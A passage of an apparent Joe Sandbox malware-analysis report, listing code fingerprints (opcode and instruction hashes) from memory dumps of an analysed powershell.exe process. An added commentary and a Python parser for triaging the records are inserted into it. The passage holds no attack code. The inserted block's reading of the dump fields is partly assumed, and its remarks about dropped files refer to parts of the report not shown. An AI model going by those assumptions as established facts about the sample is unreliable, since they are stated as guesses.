                                                                                                                                                                            • Instruction Fuzzy Hash: 39418D75B002098FCB04EFADD594AAEBBF2EF89310F148469E415EB254EB359D018BA5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 03938b1b42030b1f9e7caffbed6b71a79d8bc7473d7a5222e6bd71f83a722df0
                                                                                                                                                                            • Instruction ID: 40420e8d6a3361c2a1134aada797fa21b30aec860e5c68d930f69fe99a20415e
                                                                                                                                                                            • Opcode Fuzzy Hash: 03938b1b42030b1f9e7caffbed6b71a79d8bc7473d7a5222e6bd71f83a722df0
                                                                                                                                                                            • Instruction Fuzzy Hash: B741D6F4A00202DFEB258A28C648A6A7BF2EF85654F1480D5DB019F256DB3DDD85CBB1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9c99baba37dfd3aae8f1ac87cb1d254c1b4f5fd48fe15362af3d39d71ecc1356
                                                                                                                                                                            • Instruction ID: f6f3026fe226f4719620acb972bdccc55eb0799c7adbfa5dc763d112164c0b74
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c99baba37dfd3aae8f1ac87cb1d254c1b4f5fd48fe15362af3d39d71ecc1356
                                                                                                                                                                            • Instruction Fuzzy Hash: EC4118B4A005099FCB05CF59C5989AAFBB1FF48310B258599D825AB365C736FC52CBA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 54e1c45e9b506d92fb30d77edee96930dc1d576b69098693c0440db7b6f00d77
                                                                                                                                                                            • Instruction ID: c5b724bf87c9a62fb182d6964182ef9ad778b33edfa424183f6b691e9551004f
                                                                                                                                                                            • Opcode Fuzzy Hash: 54e1c45e9b506d92fb30d77edee96930dc1d576b69098693c0440db7b6f00d77
                                                                                                                                                                            • Instruction Fuzzy Hash: E841F5B4A005099FCB09CF59C598DBAF7B1FF48310B218559D926AB364C736FC92CBA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1b59e23144e7654354291eedd57a50561cdab541b8770bae972b4e61c8968026
                                                                                                                                                                            • Instruction ID: e0ea6c3fe5ff689334d6016845d81021dcc3e5841d7f80e558c89bc6b6624db1
                                                                                                                                                                            • Opcode Fuzzy Hash: 1b59e23144e7654354291eedd57a50561cdab541b8770bae972b4e61c8968026
                                                                                                                                                                            • Instruction Fuzzy Hash: D0310834A046098FCB14DF68C668AAEBBF2EF8D315F155098E806AB750DB35DC41CB61
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b0d437aab47ccf565d418c014acc36e3ae37525cca19e60d9d856df2dd418e93
                                                                                                                                                                            • Instruction ID: 9bf9b99975c16954bfb904ca8a937d50b319ece36e8604ed1c437077f6a4bdde
                                                                                                                                                                            • Opcode Fuzzy Hash: b0d437aab47ccf565d418c014acc36e3ae37525cca19e60d9d856df2dd418e93
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C314570B002099BCB08DFADD494BAEBAF6AF89310F148069E415EB354EB798C418B64
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5cd1b4df317eb34526f6bee320c05ebe7fd59669d932ed4b54367290990603da
                                                                                                                                                                            • Instruction ID: 9d484d97bf20a0ff1cc31c9bbdf45cc65bd43cd3d80574f2c4f5c8f02d27f4ed
                                                                                                                                                                            • Opcode Fuzzy Hash: 5cd1b4df317eb34526f6bee320c05ebe7fd59669d932ed4b54367290990603da
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D3161B4B002099FDB04EF64D858AFFB7B3EF84300F1188A9D514AB395DB39AD418B91
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e7093d782610f584ad19ec73ce9eb8f7473222c5d6f5476edf081fffeb271fd2
                                                                                                                                                                            • Instruction ID: 89d61cf3edee6b8f01e500fb152e62e0e447cf4b916c2d6a606aa2e6ef2d3dba
                                                                                                                                                                            • Opcode Fuzzy Hash: e7093d782610f584ad19ec73ce9eb8f7473222c5d6f5476edf081fffeb271fd2
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A3161749053888EDB60CF6EC0887DABFF6EB84324F28C45ED44D9B215C774A485CB65
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6ef353d662d206f25a1d739296b203c22ffcee0b9b48cac75c461ba6d7fb2db5
                                                                                                                                                                            • Instruction ID: 1398ec1374ab769009b1473ed695205415f3a53dc95789f947b7fefb579786d7
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ef353d662d206f25a1d739296b203c22ffcee0b9b48cac75c461ba6d7fb2db5
                                                                                                                                                                            • Instruction Fuzzy Hash: 303132B4F002099FDB04EF64D458BEFB7B2EF84300F1188A9D615AB394DA39AD418B91
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 534ad574aa1c36745213a6de8d934ccc19a6965c6222ce21674d80df4571a99a
                                                                                                                                                                            • Instruction ID: a33c7842669da06ad20ebe2b040a21bdb034645b1631629066e71af3cc464a6b
                                                                                                                                                                            • Opcode Fuzzy Hash: 534ad574aa1c36745213a6de8d934ccc19a6965c6222ce21674d80df4571a99a
                                                                                                                                                                            • Instruction Fuzzy Hash: 1321F175504201DFCB05DF14E9C1F2ABFB6FB88314F20C5A9ED094A256C376D456CB61
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c6f56b9c70a080d8810f8812b9446a51de4c482afb7cc5c5d48fc67d2e8ad5a2
• Instruction ID: 6c0302e94455ff4c5aede24d2606784b5202bec38d0f16df8e1577df7d77781e
• Opcode Fuzzy Hash: c6f56b9c70a080d8810f8812b9446a51de4c482afb7cc5c5d48fc67d2e8ad5a2
• Instruction Fuzzy Hash: D2213470604201DFDB14CF14E9C0F2EBBB6FB84354F24C66DD90A4B251C73AD846CA62

Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 562204eab34d584f7e4c6a04a535c07eb6cf968972c7156cf63030e29e4882e0
• Instruction ID: 33ab76c7c57cc6d35e04684c407b6687476fab794badea8cebe1866c057ce1d4
• Opcode Fuzzy Hash: 562204eab34d584f7e4c6a04a535c07eb6cf968972c7156cf63030e29e4882e0
• Instruction Fuzzy Hash: BC2157B09053488EDB60CF6EC08879AFBF6EB88324F28C02AD85E97205D77464858B64

Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 287ba26cf6302c1213f5fb5f2efbd990a5ef2e6563418382f66b7ad57d7d0d52
• Instruction ID: 8ccc7d577eca53f72c6abb85d71e9eb6e44b63d34f3ea26cbc448b324df95655
• Opcode Fuzzy Hash: 287ba26cf6302c1213f5fb5f2efbd990a5ef2e6563418382f66b7ad57d7d0d52
• Instruction Fuzzy Hash: 1F1170353042149FD704DB69E884D6FBBEAFBC87507244569E509C7355DF35DC018B90

Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a70cc1c3a7994ca142a5d3982906586ef833b173abafcb457253b91e479c28f1
• Instruction ID: 74a86741461c452221c3a822b5d103c12b095064e97d796e699ec25d88ba4770
• Opcode Fuzzy Hash: a70cc1c3a7994ca142a5d3982906586ef833b173abafcb457253b91e479c28f1
• Instruction Fuzzy Hash: AB112B39700128CFCB04DBACE9449EE77F6FBC8215B0540A5E909EB324DB35DD458B90

Memory Dump Source
• Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 55a0a897d162a48aa1695d0807ea48ae9272d7b6d465b85a1d878dd059377f2e
• Instruction ID: 03226d748875a4bae4cfe4a879a2aff3e34176d460b449b707480d4305cbe1cc
• Opcode Fuzzy Hash: 55a0a897d162a48aa1695d0807ea48ae9272d7b6d465b85a1d878dd059377f2e
• Instruction Fuzzy Hash: 3C219D76504241DFCB06CF10E9C4B26BFB2FB84318F24C5AADD094A256C33AD46ACBA1

Memory Dump Source
• Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dfb69699e82f8749078797bbb1e26de38cb25b611a27f389bbf9743ae2ba0f89
• Instruction ID: cb535ba5e4c48327b22fe927bc010c9094e4e3d03b4b0a3ca15daf939f9de95d
• Opcode Fuzzy Hash: dfb69699e82f8749078797bbb1e26de38cb25b611a27f389bbf9743ae2ba0f89
• Instruction Fuzzy Hash: 6E117975504280DFDB16CF14E9C4B29BBB2FB84214F28C6AADC494B656C33AD44ACF62

Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 33f2ceea629a02465628e4ac283173438b266f495b38c08f4e4e45cfc36bc152
• Instruction ID: e946be0e276d0edcf9500b7e5cc3a0a1514234db46eecb2647371e5aa1cbced8
• Opcode Fuzzy Hash: 33f2ceea629a02465628e4ac283173438b266f495b38c08f4e4e45cfc36bc152
• Instruction Fuzzy Hash: 22111734204B50CFC728DF79D48185ABBF6EF8921532489ADD08A8B7A0DB36EC42CB50

Memory Dump Source
• Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 210b3850ce87642830810233dd6cc9bd074d6af6f3419133e271ac6b9eea06a3
• Instruction ID: b7770ed534e4e925391b3b5223d78f6ba5db39f057b26c68c23b918c39c36fca
• Opcode Fuzzy Hash: 210b3850ce87642830810233dd6cc9bd074d6af6f3419133e271ac6b9eea06a3
• Instruction Fuzzy Hash: 13015E7200D3D09EE7164B259C94766BFA8EF42224F18859BE9888F1A7C2699C46C772

Memory Dump Source
• Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 101d571f0f4930b7d829993483a892a41cff14b6b3151d45a5bd27dea23b33f3
• Instruction ID: b0aceae311a0075a2e0537aec37032a8b964c5e1c5333b0035068ad29fb1be50
• Opcode Fuzzy Hash: 101d571f0f4930b7d829993483a892a41cff14b6b3151d45a5bd27dea23b33f3
• Instruction Fuzzy Hash: 3701F7320083509AE7108A25D9C4B6FBFD8EF41324F48C529ED494A196C279DC42C6B2

Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 162111df11139975a7f5528cc831654e47d4e7b65a939082e9c308f40b0892f9
• Instruction ID: 4777f89c122a1d8b8638d74ef33dbabe7092c456054d659b82b5c9a55888deb4
• Opcode Fuzzy Hash: 162111df11139975a7f5528cc831654e47d4e7b65a939082e9c308f40b0892f9
• Instruction Fuzzy Hash: 5B018BB0904B598FCB249F6DA5086AEBFF0EF48304B40C92EE4AED7741C374A5048B81

Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e727be5026f191d642e9276e9d3baf25d7d08a5ff93d3a4a3b7ac014d0abfbd8
• Instruction ID: 69f2562fa9f104adcbe7741022504943aebc2b71d8cb47e9fcf573ea9e9e8ba2
• Opcode Fuzzy Hash: e727be5026f191d642e9276e9d3baf25d7d08a5ff93d3a4a3b7ac014d0abfbd8
• Instruction Fuzzy Hash: BD0126306082044BC311AB39D4183DF7BB6EFC6228F0480AAC9054B286CA3A284AC7A1

Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a64be863f56ee94b9f09349b60b02b43d6cb02f4278bfe9a8f327561948d43aa
• Instruction ID: 6a4a59edfbd988bfca47bb6d704a29bf331444663ffcee9c70ea3e84781d2daa
• Opcode Fuzzy Hash: a64be863f56ee94b9f09349b60b02b43d6cb02f4278bfe9a8f327561948d43aa
• Instruction Fuzzy Hash: 19F05E353046498FC7149A1CE858C25BBF6EFCB662B1640AAF549CB376CB21DC008791

Memory Dump Source
• Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2889e2dfa912f12df0a751ec29dd398079274e0ae4c658dda9523768ef6eb824
• Instruction ID: 661ee840e5e9162d100b7437352791e7f2671c861313030b1d21ff8568860da1
• Opcode Fuzzy Hash: 2889e2dfa912f12df0a751ec29dd398079274e0ae4c658dda9523768ef6eb824
• Instruction Fuzzy Hash: CAF0F976200610AF9724CF0AD985C27FBAEFBD4670715C55AF94A4B711C771FC42CAA0
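The records above all follow one fixed layout, so they can be pulled into structured form for triage instead of being read one at a time. The following parser is an added example, not Joe Sandbox code and not part of this report; its sample input is two records copied from the page (one for each of the two dump regions, 05170000 and 0502D000, of process index 0x15). How the dotted fields of the .sdmp file name are interpreted is an assumption: the first two fields (0x15 = 21, 2) match the `hcaresult_21_2_...` snapshot name and the fourth equals the stated Offset, which supports reading them as process index, run and region base, while reading the fifth field (00000040) as a Win32 memory-protection value, i.e. PAGE_EXECUTE_READWRITE, is the assumption. Every record here is "based on PE: false", so a practitioner should keep in mind that in a powershell.exe process writable-executable, non-PE-backed regions commonly hold .NET JIT output, and fingerprints from them need confirming against the dropped files before being treated as the payload's own code.

```python
import re
from collections import defaultdict

# Constructed sample input: two records copied from the report (one per dump region).
SAMPLE_RECORDS = """\
Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 287ba26cf6302c1213f5fb5f2efbd990a5ef2e6563418382f66b7ad57d7d0d52
• Instruction ID: 8ccc7d577eca53f72c6abb85d71e9eb6e44b63d34f3ea26cbc448b324df95655
• Opcode Fuzzy Hash: 287ba26cf6302c1213f5fb5f2efbd990a5ef2e6563418382f66b7ad57d7d0d52
• Instruction Fuzzy Hash: 1F1170353042149FD704DB69E884D6FBBEAFBC87507244569E509C7355DF35DC018B90
Memory Dump Source
• Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 55a0a897d162a48aa1695d0807ea48ae9272d7b6d465b85a1d878dd059377f2e
• Instruction ID: 03226d748875a4bae4cfe4a879a2aff3e34176d460b449b707480d4305cbe1cc
• Opcode Fuzzy Hash: 55a0a897d162a48aa1695d0807ea48ae9272d7b6d465b85a1d878dd059377f2e
• Instruction Fuzzy Hash: 3C219D76504241DFCB06CF10E9C4B26BFB2FB84318F24C5AADD094A256C33AD46ACBA1
"""

PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory-protection constant

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SOURCE_RE = re.compile(
    r"^(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$"
)


def parse_sdmp_name(name):
    """Split the dotted .sdmp file name into its fields.

    ASSUMPTION: field 1 = process index, field 2 = analysis run, field 4 = region
    base (the page supports these: 0x15 = 21 and 2 recur in the snapshot name and
    field 4 equals the Offset); reading field 5 as a Win32 protection value is an
    assumption. The other fields are kept raw.
    """
    parts = name[: -len(".sdmp")].split(".")
    if len(parts) != 8:
        raise ValueError("unexpected sdmp name layout: %s" % name)
    return {
        "process_index": int(parts[0], 16),
        "run": int(parts[1], 16),
        "dump_id": parts[2],
        "base": int(parts[3], 16),
        "protect": int(parts[4], 16),
        "raw_fields": parts,
    }


def parse_records(text):
    """Return one dict per 'Memory Dump Source' record; empty fields become None."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()  # the rendered report carries deep indentation
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        if current is None:  # text before the first record header
            continue
        m = FIELD_RE.match(line)
        if not m:  # section labels: 'Joe Sandbox IDA Plugin', 'Similarity'
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            s = SOURCE_RE.match(value)
            if not s:
                raise ValueError("unexpected Source File line: %s" % value)
            current["source_file"] = s.group("file")
            current["offset"] = int(s.group("offset"), 16)
            current["based_on_pe"] = s.group("pe") == "true"
            current["dump"] = parse_sdmp_name(s.group("file"))
        else:
            current[key.lower().replace(" ", "_")] = value or None
    return records


def group_by_region(records):
    """Map (process index, region base) -> list of Opcode IDs fingerprinted there."""
    regions = defaultdict(list)
    for r in records:
        regions[(r["dump"]["process_index"], r["offset"])].append(r["opcode_id"])
    return dict(regions)


def rwx_non_pe(records):
    """Records whose dump is writable+executable and not backed by a PE image:
    the regions that need a second look (injected code, or a JIT code heap)."""
    return [
        r for r in records
        if r["dump"]["protect"] == PAGE_EXECUTE_READWRITE and not r["based_on_pe"]
    ]


def opcode_id_matches_fuzzy_hash(records):
    """True when every record's Opcode ID equals its Opcode Fuzzy Hash, as on this page."""
    return all(r["opcode_id"] == r["opcode_fuzzy_hash"] for r in records)


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for (proc, base), ids in sorted(group_by_region(recs).items()):
        print("process %d region 0x%08X: %d fingerprint(s)" % (proc, base, len(ids)))
    print("RWX, non-PE dumps:", len(rwx_non_pe(recs)))
```

Feed the whole fingerprint section of the report to `parse_records` and `group_by_region` gives a per-region count of fingerprinted functions; `rwx_non_pe` isolates the dumps worth diffing against the dropped driver and executables, and the Opcode IDs can be compared across reports to find shared functions.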
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6ba537b2b1938f0141de639ceb5621f47de25ac9b0c1ff3d40a158acb5725fc7
                                                                                                                                                                            • Instruction ID: a917941afb4068107b7972b47e9124b4207a1a6f125919ab4fa16e95294c2f3b
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ba537b2b1938f0141de639ceb5621f47de25ac9b0c1ff3d40a158acb5725fc7
                                                                                                                                                                            • Instruction Fuzzy Hash: C7F0F430A093884FCB169B78D9045EC3FB1EF85162F1880E6D904DB26BCB2498468761
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6c11b1dd156857f151606472c28e2fbb1a80528b3587c11c66068ab848f0c5b1
                                                                                                                                                                            • Instruction ID: 3549eaf2ad5c5e307725b37e21ed3ed280835dd6dccdfc42d69c30db06f63604
                                                                                                                                                                            • Opcode Fuzzy Hash: 6c11b1dd156857f151606472c28e2fbb1a80528b3587c11c66068ab848f0c5b1
                                                                                                                                                                            • Instruction Fuzzy Hash: D1F0A775A0410C97C728A65DFE148E8BB76EFC8221F10C47AE555A7304DF629C4587A2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d974ca62a3ca770cad4b18cd41e9eb02eda6de327cd20a41866d63d9d39b16a5
                                                                                                                                                                            • Instruction ID: 1b4c58dd516d42f1b0e0d1338f8e2087abfc7430d2bda3a5dd07c1356277bd4d
                                                                                                                                                                            • Opcode Fuzzy Hash: d974ca62a3ca770cad4b18cd41e9eb02eda6de327cd20a41866d63d9d39b16a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 24F020B2784B4C0BCB22661D79148AE7BB6DFC6160344846BE018DBB42CF24880A83E6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2b8fd916ba22dbfba7c7cc94511ce4f2b25ec5ac41859e1ecaf775a495ad4508
                                                                                                                                                                            • Instruction ID: aa7298a627971fef1dd29bd4189fc5a65ecf8cca6dd715bb5e601137ee90acfc
                                                                                                                                                                            • Opcode Fuzzy Hash: 2b8fd916ba22dbfba7c7cc94511ce4f2b25ec5ac41859e1ecaf775a495ad4508
                                                                                                                                                                            • Instruction Fuzzy Hash: 93F0F976104680AFD725CF06C985D23BBBAFB85624B198599F89A5B352C731FC42CBA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dd61fdab145dec6aa53855b8e49afa05c469749d1800b63ff64ef3af63095e49
                                                                                                                                                                            • Instruction ID: bec8ac1aed591a7465f19d72f28c03c7043c7ff69533d0ebd46ea0704df293a9
                                                                                                                                                                            • Opcode Fuzzy Hash: dd61fdab145dec6aa53855b8e49afa05c469749d1800b63ff64ef3af63095e49
                                                                                                                                                                            • Instruction Fuzzy Hash: 7AF06D315053144FC7619B78D8A839A7BB5EF41310F04849AD55EC7292DB39A885CB92
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6767f453932c3e2e1f90e5a57dcbd49e62b9cfd47e4212a5edc1762ff0c871d8
                                                                                                                                                                            • Instruction ID: 8f9074a53f674a9d2eeddd9b6a2b58910674e65d64c3035aa12833ba9fc13e15
                                                                                                                                                                            • Opcode Fuzzy Hash: 6767f453932c3e2e1f90e5a57dcbd49e62b9cfd47e4212a5edc1762ff0c871d8
                                                                                                                                                                            • Instruction Fuzzy Hash: 43E092253051586A865561BE8818AB676AE4AE7461F980376AA19D7343EA05C80683F4
                                                                                                                                                                            Memory Dump Source
